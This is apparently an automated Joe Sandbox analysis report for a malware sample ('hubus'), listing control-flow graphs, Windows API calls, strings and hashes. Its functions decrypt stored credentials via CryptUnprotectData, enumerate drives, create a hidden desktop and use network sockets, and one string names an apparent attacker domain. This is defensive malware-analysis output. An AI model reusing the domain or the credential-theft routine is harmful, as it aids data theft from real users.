1068 42da28 1065->1068 1066->1061 1069 42da6b-42da6d 1067->1069 1070 42da3d-42da69 1067->1070 1068->1046 1069->1052 1070->1052
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D62F
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042D6EF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                                                                              • String ID: /g$:!?w$Z!Xt$^
                                                                                                                                                                                                                                                              • API String ID: 3545744682-1434922922
                                                                                                                                                                                                                                                              • Opcode ID: 0c50819a54f824eabe150f310b87649d1c7876c4f9f567aa1395634ca494eca6
                                                                                                                                                                                                                                                              • Instruction ID: 3aeb150c100e40f943150e07c445a2eecbbc4d003f70bf4eef6993bfc1ffacdd
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c50819a54f824eabe150f310b87649d1c7876c4f9f567aa1395634ca494eca6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECD10720A0C3D18ED7258B3994517BBBBD19F97304F58496ED0CD9B383C779850AC76A
                                                                                                                                                                                                                                                              Function 00415ED1 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 321COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1071 415ed1-415ed7 1072 415ed9-415ef7 call 43c160 1071->1072 1073 415efa-415eff 1071->1073 1072->1073 1075 4162e7-4162e9 1073->1075 1076 415f06 1073->1076 1077 415f0c-415f23 1073->1077 1078 416313-416354 call 43ddb0 CreateProcessW 1075->1078 1076->1077 1079 415f30-415f59 1077->1079 1078->1075 1088 4170b8-4170bb 1078->1088 1089 41630c 1078->1089 1079->1079 1081 415f5b-415f66 1079->1081 1083 415f68-415f6f 1081->1083 1084 415f7b-415f88 1081->1084 1086 415f70-415f79 1083->1086 1087 415f90-415f98 1084->1087 1086->1084 1086->1086 1087->1087 1090 415f9a-415fc4 1087->1090 1091 417410-417435 call 41c0b0 1088->1091 1092 4170c2-4170cf 1088->1092 1093 4172e7-417313 1088->1093 1094 4171fc-417213 1088->1094 1089->1078 1096 415fc6 1090->1096 1097 415fcb-416062 call 407f70 1090->1097 1107 417440-417454 call 43a920 1091->1107 1099 4170d0-41715c 1092->1099 1100 417320-4173ac 1093->1100 1095 417220-4172ac 1094->1095 1095->1095 1101 4172b2-4172ba 1095->1101 1096->1097 1115 416070-4160b4 1097->1115 1099->1099 1104 417162-41716e 1099->1104 1100->1100 1105 4173b2-4173be 1100->1105 1101->1091 1106 4172c0-4172cf 1101->1106 1109 4171f0-4171f5 1104->1109 1110 417174-41717f 1104->1110 1105->1073 1111 4173c4-4173cf 1105->1111 1113 4172d0-4172d7 1106->1113 1128 4175d0-4175d4 1107->1128 1129 4176c0-4176c5 1107->1129 1130 4175b3-4175bf call 43ac40 1107->1130 1131 417529-41753b 1107->1131 1132 4176e9-4176ee 1107->1132 1133 41745b-417468 1107->1133 1134 4175db-4175ff 1107->1134 1135 41746f-417486 1107->1135 1136 41751f-417524 1107->1136 1109->1093 1109->1094 1116 417180-417187 1110->1116 1112 4173d0-4173d7 1111->1112 1112->1071 1117 4173dd-4173e0 1112->1117 1118 4173e7-4173ed 1113->1118 1119 4172dd-4172e0 1113->1119 1115->1115 1121 4160b6-41612f 1115->1121 1122 417189-41718c 1116->1122 1123 4171bc-4171c2 1116->1123 1117->1112 1125 4173e2 1117->1125 1118->1091 1126 4173ef-417403 call 43c160 1118->1126 1119->1113 1127 4172e2 1119->1127 1137 416130-416159 1121->1137 1122->1116 1138 41718e 1122->1138 1123->1109 1124 4171c4-4171e6 call 43c160 1123->1124 1124->1109 1125->1073 1126->1091 1127->1091 1128->1129 1128->1132 1128->1134 1129->1128 1129->1129 1129->1130 1129->1131 1129->1133 1129->1134 1129->1135 1129->1136 1142 4176cc-4176d2 1129->1142 1130->1136 1146 417540-41756f 1131->1146 1133->1128 1133->1129 1133->1130 1133->1131 1133->1132 1133->1134 1133->1135 1133->1136 1140 417600-41768c 1134->1140 1143 417490-4174d2 1135->1143 1136->1107 1137->1137 1144 41615b-41616c 1137->1144 1138->1109 1140->1140 1152 417692-41769d 1140->1152 1155 4176d8 1142->1155 1156 4162eb-416303 call 43c160 1142->1156 1143->1143 1147 4174d4-4174df 1143->1147 1148 416191-41619e 1144->1148 1149 41616e-416175 1144->1149 1146->1146 1154 417571-417578 1146->1154 1160 4174e1-4174e5 1147->1160 1161 4174fb-417518 call 43ab30 1147->1161 1163 4161c1-4161d1 1148->1163 1164 4161a0-4161a4 1148->1164 1162 416180-41618f 1149->1162 1158 4176e0-4176e2 1152->1158 1159 41769f-4176af 1152->1159 1165 41758b-4175ac call 43acd0 1154->1165 1166 41757a-41757f 1154->1166 1155->1158 1156->1089 1158->1128 1158->1129 1158->1130 1158->1131 1158->1132 1158->1133 1158->1134 1158->1135 1158->1136 1173 4176b0-4176b7 1159->1173 1168 4174f0-4174f9 1160->1168 1161->1128 1161->1129 1161->1130 1161->1131 1161->1132 1161->1134 1161->1136 1162->1148 1162->1162 1171 4161f1-416201 1163->1171 1172 4161d3-4161da 1163->1172 1170 4161b0-4161bf 1164->1170 1165->1128 1165->1129 1165->1130 1165->1132 1165->1134 1174 417580-417589 1166->1174 1168->1161 1168->1168 1170->1163 1170->1170 1179 416221-416230 1171->1179 1180 416203-41620a 1171->1180 1178 4161e0-4161ef 1172->1178 1173->1142 1176 4176b9-4176bc 1173->1176 1174->1165 1174->1174 1176->1173 1182 4176be 1176->1182 1178->1171 1178->1178 1184 416251-4162e0 1179->1184 1185 416232-416239 1179->1185 1183 416210-41621f 1180->1183 1182->1158 1183->1179 1183->1183 1184->1075 1184->1089 1186 416240-41624f 1185->1186 1186->1184 1186->1186
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                                              • String ID: D$LE$tG$mA
                                                                                                                                                                                                                                                              • API String ID: 2994545307-282404452
                                                                                                                                                                                                                                                              • Opcode ID: fa75395c2e3965a799225513f5818ed3bb8782f53bb49ec524cc1422d11b4c5c
                                                                                                                                                                                                                                                              • Instruction ID: 6ebcf6c4a4bbd5fc6d374ebe3adfe343ee093c1239a137f7424f43b33e1515bc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa75395c2e3965a799225513f5818ed3bb8782f53bb49ec524cc1422d11b4c5c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BB17D70508340CFD324CF24C8A5BABBBF1FF86344F05895DE0859B2A2E7798945CB9A
                                                                                                                                                                                                                                                              Function 00408710 Relevance: 7.7, APIs: 5, Instructions: 157threadCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1187 408710-408721 call 43bb50 1190 408727-40874f call 407f70 1187->1190 1191 40890c-40890e ExitProcess 1187->1191 1194 408750-408773 1190->1194 1195 408794-4087a6 call 434ee0 1194->1195 1196 408775-408792 1194->1196 1199 4088f5-4088fc 1195->1199 1200 4087ac-4087cf GetCurrentProcessId GetCurrentThreadId 1195->1200 1196->1194 1201 408907 call 43c0c0 1199->1201 1202 4088fe-408904 call 407f80 1199->1202 1203 4087d1-4087d3 1200->1203 1204 4087d5-408886 SHGetSpecialFolderPathW GetForegroundWindow 1200->1204 1201->1191 1202->1201 1203->1204 1205 4088b6-4088e9 call 409a20 1204->1205 1206 408888-4088b4 1204->1206 1205->1199 1212 4088eb call 40c5e0 1205->1212 1206->1205 1214 4088f0 call 40b3b0 1212->1214 1214->1199
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004087AC
                                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004087B5
                                                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408869
                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040887E
                                                                                                                                                                                                                                                                • Part of subcall function 0040C5E0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5F3
                                                                                                                                                                                                                                                                • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32(004088F5), ref: 0040B3B6
                                                                                                                                                                                                                                                                • Part of subcall function 0040B3B0: FreeLibrary.KERNEL32 ref: 0040B3D7
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040890E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3072701918-0
                                                                                                                                                                                                                                                              • Opcode ID: 092eeac04e3235b3cffdd63d5fdc64b0968430b27af5ec40e86791fb6eade397
                                                                                                                                                                                                                                                              • Instruction ID: c0d0f8101dccc444c7a8ef3ccfd2f931438813064df6d6c753299e275b31ea86
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 092eeac04e3235b3cffdd63d5fdc64b0968430b27af5ec40e86791fb6eade397
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0515CB7B003144BD318AF65CD4536676978BC5710F0AC13DAA85AF3D6EE78AC0686C9
                                                                                                                                                                                                                                                              Function 0040D0C6 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1325 40d0c6-40d0fa call 432d40 call 4094b0 CoUninitialize 1330 40d100-40d128 1325->1330 1330->1330 1331 40d12a-40d13b 1330->1331 1332 40d140-40d183 1331->1332 1332->1332 1333 40d185-40d1ea 1332->1333 1334 40d1f0-40d227 1333->1334 1334->1334 1335 40d229-40d23a 1334->1335 1336 40d25b-40d26e 1335->1336 1337 40d23c-40d24a 1335->1337 1339 40d270-40d271 1336->1339 1340 40d28b-40d295 1336->1340 1338 40d250-40d259 1337->1338 1338->1336 1338->1338 1341 40d280-40d289 1339->1341 1342 40d297-40d29b 1340->1342 1343 40d2ab-40d2b3 1340->1343 1341->1340 1341->1341 1344 40d2a0-40d2a9 1342->1344 1345 40d2b5-40d2b6 1343->1345 1346 40d2cb-40d2d5 1343->1346 1344->1343 1344->1344 1347 40d2c0-40d2c9 1345->1347 1348 40d2d7-40d2db 1346->1348 1349 40d2eb-40d2f7 1346->1349 1347->1346 1347->1347 1350 40d2e0-40d2e9 1348->1350 1351 40d311-40d431 1349->1351 1352 40d2f9-40d2fb 1349->1352 1350->1349 1350->1350 1353 40d440-40d461 1351->1353 1354 40d300-40d30d 1352->1354 1353->1353 1356 40d463-40d47f 1353->1356 1354->1354 1355 40d30f 1354->1355 1355->1351 1357 40d480-40d4a1 1356->1357 1357->1357 1358 40d4a3-40d4c6 call 40b3e0 1357->1358 1360 40d4cb-40d4ec 1358->1360
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                                                                              • String ID: 67$testyhurriedo.click$~zpH
                                                                                                                                                                                                                                                              • API String ID: 3861434553-2181984717
                                                                                                                                                                                                                                                              • Opcode ID: 1be672a5bdf9757e926f4921a3c06c074e7deaefdc987ae9b41fec6f68bdfe7c
                                                                                                                                                                                                                                                              • Instruction ID: deebea354d72f030b423c3d853cb2474300e146dd88e3963930101d30d9c0535
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1be672a5bdf9757e926f4921a3c06c074e7deaefdc987ae9b41fec6f68bdfe7c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2A1E17090D3C08BD325CF6988907EBBBE1AFD6304F18896DD0D95B396C779450ACB56
                                                                                                                                                                                                                                                              Function 00424010 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 549COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1361 424010-424062 1362 424070-424096 1361->1362 1362->1362 1363 424098-4240e2 1362->1363 1365 4240f0-424143 1363->1365 1365->1365 1366 424145-424150 1365->1366 1367 4244a2-4244ae 1366->1367 1368 4241c2-4241ca 1366->1368 1369 4241a0 1366->1369 1370 4241c0 1366->1370 1371 4242c0 1366->1371 1372 4241a6 1366->1372 1373 4242c6-4242cd 1366->1373 1374 4244af-42455f 1366->1374 1375 4241ac-4241b2 call 407f80 1366->1375 1376 4242d6-4242de 1366->1376 1377 424157-42415c 1366->1377 1378 424474 1366->1378 1379 4241b5-4241bf 1366->1379 1380 424498-42449f 1366->1380 1381 424458-42446d 1366->1381 1382 4241d3 1368->1382 1383 4241cc-4241d1 1368->1383 1369->1372 1372->1375 1373->1376 1393 424560-4245ac 1374->1393 1375->1379 1394 4242e0-4242e5 1376->1394 1395 4242e7 1376->1395 1391 424165 1377->1391 1392 42415e-424163 1377->1392 1379->1370 1384 4244a0 1380->1384 1381->1367 1381->1378 1381->1380 1381->1384 1385 424737 1381->1385 1386 42447a-424480 call 407f80 1381->1386 1387 424489 1381->1387 1388 4245ce-4245e6 1381->1388 1389 42448f-424495 call 407f80 1381->1389 1390 42473d-424746 call 407f80 1381->1390 1398 4241da-424211 call 407f70 1382->1398 1383->1398 1386->1387 1404 4245f0-42464b 1388->1404 1389->1380 1401 424168-42418c call 407f70 1391->1401 1392->1401 1393->1393 1402 4245ae-4245be call 4223a0 1393->1402 1403 4242ee-42439b call 407f70 1394->1403 1395->1403 1419 424220-42423e 1398->1419 1401->1368 1401->1369 1401->1370 1401->1371 1401->1372 1401->1373 1401->1374 1401->1375 1401->1376 1401->1378 1401->1379 1401->1380 1401->1381 1416 4245c3-4245c6 1402->1416 1420 4243a0-4243d6 1403->1420 1404->1404 1413 42464d-4246d3 1404->1413 1418 4246e0-42470a 1413->1418 1416->1388 1418->1418 1421 42470c-42472f call 422060 1418->1421 1419->1419 1422 424240-424248 1419->1422 1420->1420 1424 4243d8-4243e0 1420->1424 1421->1385 1426 424261-42426e 1422->1426 1427 42424a-42424f 1422->1427 1428 4243e2-4243e9 1424->1428 1429 424401-42440e 1424->1429 1432 424270-424274 1426->1432 1433 424291-42429c call 43f7c0 1426->1433 1431 424250-42425f 1427->1431 1434 4243f0-4243ff 1428->1434 1435 424410-424414 1429->1435 1436 424431-424451 GetLogicalDrives call 43f7c0 1429->1436 1431->1426 1431->1431 1439 424280-42428f 1432->1439 1442 4242a1-4242ad 1433->1442 1434->1429 1434->1434 1437 424420-42442f 1435->1437 1436->1367 1436->1378 1436->1380 1436->1381 1436->1384 1436->1385 1436->1386 1436->1387 1436->1388 1436->1389 1436->1390 1437->1436 1437->1437 1439->1433 1439->1439 1442->1371 1442->1373 1442->1374 1442->1376 1442->1378 1442->1381 1442->1386 1442->1388
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: BB$UG
                                                                                                                                                                                                                                                              • API String ID: 0-4103563041
                                                                                                                                                                                                                                                              • Opcode ID: 1bae9f378745d61849d634dce9bf024f166762a28b5d2be9344c3564e0e9dc10
                                                                                                                                                                                                                                                              • Instruction ID: 156d9476684e9010c292169df6e28d61ec67e40a4f764ac4d0a5d14728a1d911
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bae9f378745d61849d634dce9bf024f166762a28b5d2be9344c3564e0e9dc10
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F0210B5A083409FD310CF64E88162BBBE5EBD2304F54892DF9859B352D7B8D906CB97
                                                                                                                                                                                                                                                              Function 00419F2F Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 357COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1443 419f2f-419f37 call 407f80 1446 41a05a-41a074 1443->1446 1447 41a080-41a10c 1446->1447 1447->1447 1448 41a112-41a121 1447->1448 1449 41a127-41a136 1448->1449 1450 41a1aa-41a213 call 401a60 1448->1450 1452 41a140-41a147 1449->1452 1457 41a220-41a23f 1450->1457 1454 41a149-41a14c 1452->1454 1455 41a18e-41a194 1452->1455 1454->1452 1458 41a14e 1454->1458 1455->1450 1456 41a196-41a1a7 call 43c160 1455->1456 1456->1450 1457->1457 1460 41a241-41a25a call 401da0 1457->1460 1458->1450 1464 41a261-41a263 1460->1464 1465 419f48-419faf 1460->1465 1466 41a42d 1460->1466 1468 41a270-41a276 1464->1468 1467 419fb0-41a015 1465->1467 1470 41a434 1466->1470 1467->1467 1469 41a017-41a03c call 401da0 1467->1469 1468->1468 1471 41a278-41a289 1468->1471 1469->1465 1477 41a043-41a053 1469->1477 1478 419f3c-419f45 call 407f80 1469->1478 1470->1470 1473 41a290 1471->1473 1474 41a28b-41a28e 1471->1474 1476 41a291-41a29d 1473->1476 1474->1473 1474->1476 1479 41a2a4 1476->1479 1480 41a29f-41a2a2 1476->1480 1477->1446 1477->1464 1477->1465 1477->1466 1482 41a150-41a187 call 407f70 call 43fad0 1477->1482 1483 419f0d-419f21 call 401000 1477->1483 1484 419efc 1477->1484 1485 419f2e 1477->1485 1478->1465 1481 41a2a5-41a2c7 call 407f70 1479->1481 1480->1479 1480->1481 1495 41a3c7-41a3fe call 43ddb0 1481->1495 1496 41a2cd-41a2d4 1481->1496 1482->1446 1482->1450 1482->1464 1482->1465 1482->1466 1482->1483 1482->1484 1482->1485 1483->1485 1484->1483 1485->1443 1501 41a403-41a423 CryptUnprotectData 1495->1501 1498 41a2f0-41a334 call 41e6e0 * 2 1496->1498 1505 41a2e0-41a2ea 1498->1505 1506 41a336-41a351 call 41e6e0 1498->1506 1501->1466 1505->1495 1505->1498 1506->1505 1509 41a353-41a37b 1506->1509 1510 41a381-41a397 call 41e6e0 1509->1510 1511 41a2da-41a2df 1509->1511 1514 41a2d6 1510->1514 1515 41a39d-41a3c2 1510->1515 1511->1505 1514->1511 1515->1505
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: pzs$
                                                                                                                                                                                                                                                              • API String ID: 0-1216481787
                                                                                                                                                                                                                                                              • Opcode ID: 0bf6f35e0ff0436d12387b4112f6c39f81766946263b006ec817a30d5d12b92f
                                                                                                                                                                                                                                                              • Instruction ID: bad2e4c237128bc080bfd88e0f25895fa9b25d80b2d5779574f6d248565b9fff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0bf6f35e0ff0436d12387b4112f6c39f81766946263b006ec817a30d5d12b92f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41C136B2A083418BD724CF24C8957AFB7E2FBD5304F198A2DD48987391DB399855CB86
                                                                                                                                                                                                                                                              Function 0041BBE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateDesktopW.USER32(?,00000000,00000000,00000000,000F00C7,00000000), ref: 0041BE35
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateDesktop
                                                                                                                                                                                                                                                              • String ID: _
                                                                                                                                                                                                                                                              • API String ID: 3054513912-701932520
                                                                                                                                                                                                                                                              • Opcode ID: 79e920932bf8c8fe88a024a38772ef965ff936ab1767f59d9bd425f3fd819cf0
                                                                                                                                                                                                                                                              • Instruction ID: 4ce81509d8cd9a23daa770fb3e49070650a0af60648e147c24ad5a6effd23c45
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79e920932bf8c8fe88a024a38772ef965ff936ab1767f59d9bd425f3fd819cf0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A551E554104A9049EB08DF398896B3B7AE0AF49305F1984EEDC98CF767E63CC250879E
                                                                                                                                                                                                                                                              Function 0041C7D5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0041C805
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: setsockopt
                                                                                                                                                                                                                                                              • String ID: vJrs
                                                                                                                                                                                                                                                              • API String ID: 3981526788-3323466680
                                                                                                                                                                                                                                                              • Opcode ID: 40e4336516464f17a9a85ad5e24b27cd5934eda13464c7807d987de5ecbb01a3
                                                                                                                                                                                                                                                              • Instruction ID: 98593c24a1453f5bf84ee3f46e3e4b8f475c628dc156d1cf6c26ae65fe981a89
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40e4336516464f17a9a85ad5e24b27cd5934eda13464c7807d987de5ecbb01a3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 294117B19483808BD714CF25C8827ABFBE2ABD2300F18995DE1D1973A1C7B9C4458B46
                                                                                                                                                                                                                                                              Function 0041EB40 Relevance: 3.3, APIs: 2, Instructions: 337networkCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000008), ref: 0041EB75
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000008), ref: 0041EBFF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                                              • Opcode ID: fa826dc67195711b9b59684b60876711ea6b93a9197a95b9212c2e0eda6aaed0
                                                                                                                                                                                                                                                              • Instruction ID: c546ce4e7ee96c044b2a1e8526a6e3fa6032fa1f2717532fc29bc07f5623e7fe
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa826dc67195711b9b59684b60876711ea6b93a9197a95b9212c2e0eda6aaed0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEB14979908301AFD7108F25EC41B6BBBE1FFD5314F14492EF898933A1E73A98568B46
                                                                                                                                                                                                                                                              Function 0041E800 Relevance: 1.8, APIs: 1, Instructions: 313networkCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • send.WS2_32(?,?,?,00000000), ref: 0041EA63
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: send
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2809346765-0
                                                                                                                                                                                                                                                              • Opcode ID: 0913cf17ee5a4bb02cc69381b4723db3460ea131947e0660a623828ae067dbf8
                                                                                                                                                                                                                                                              • Instruction ID: 47f7024de55383af9514d53ea663867582980b6d3d043f8729ceaff0136fe413
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0913cf17ee5a4bb02cc69381b4723db3460ea131947e0660a623828ae067dbf8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AA10876A082125FC711CE2DCC4169BBBD2AFD5364F18C63EE8A9C73C2D638D8469781
                                                                                                                                                                                                                                                              Function 00420180 Relevance: 1.6, APIs: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • recv.WS2_32(?,?,00001000,00000008), ref: 004201F3
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                                              • Opcode ID: a3d352ba1500daa873bc2e1b731313c5639911baa2ba9f2ef41b5df1ffb41802
                                                                                                                                                                                                                                                              • Instruction ID: 5ade27df3f6db9a55fef383d3ef8c5deb3f20145a287bda5ab13def6158d7a29
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3d352ba1500daa873bc2e1b731313c5639911baa2ba9f2ef41b5df1ffb41802
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C21F475B082159FD7149F59EC40E2BB7D6AFC8304F00453EF498933A2DA369C168B65
                                                                                                                                                                                                                                                              Function 0043C160 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0043F5B8,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C18E
                                                                                                                                                                                                                                                              Memory Dump Source
